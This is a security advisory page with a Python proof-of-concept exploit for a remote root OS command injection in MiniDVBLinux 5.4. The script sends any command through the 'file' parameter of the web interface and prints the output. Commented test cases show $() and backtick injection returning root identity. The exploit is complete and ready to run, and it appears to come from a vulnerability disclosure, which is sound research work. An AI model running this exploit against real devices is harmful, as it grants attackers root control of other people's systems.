Headline
MiniDVBLinux 5.4 Remote Root Command Injection
MiniDVBLinux version 5.4 suffers from an OS command injection vulnerability. This can be exploited to execute arbitrary commands with root privileges.
#!/usr/bin/env python3### MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability### Vendor: MiniDVBLinux# Product web page: https://www.minidvblinux.de# Affected version: <=5.4## Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple# way to convert a standard PC into a Multi Media Centre based on the# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this# Linux based Digital Video Recorder: Watch TV, Timer controlled# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration# via browser, and a lot more. MLD strives to be as small as possible,# modular, simple. It supports numerous hardware platforms, like classic# desktops in 32/64bit and also various low power ARM systems.## Desc: The application suffers from an OS command injection vulnerability.# This can be exploited to execute arbitrary commands with root privileges.## Tested on: MiniDVBLinux 5.4# BusyBox v1.25.1# Architecture: armhf, armhf-rpi2# GNU/Linux 4.19.127.203 (armv7l)# VideoDiskRecorder 2.4.6### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# @zeroscience### Advisory ID: ZSL-2022-5717# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php### 24.09.2022#import requestsimport re,sys#test case 001#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT#test case 004#http://ip:8008/?site=about&name=blind&file=$(id)#cat: can't open 'uid=0(root)': No such file or directory#cat: can't open 'gid=0(root)': No such file or directory#test case 005#http://ip:8008/?site=about&name=blind&file=`id`#cat: can't open 'uid=0(root)': No such file or directory#cat: can't open 'gid=0(root)': No such file or directoryif len(sys.argv) < 3: print('MiniDVBLinux 5.4 Command Injection PoC') print('Usage: ./mldhd_root2.py [url] [cmd]') sys.exit(17)else: url = sys.argv[1] cmd = sys.argv[2]req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()print(outz.replace('<pre>','').replace('</pre>',''))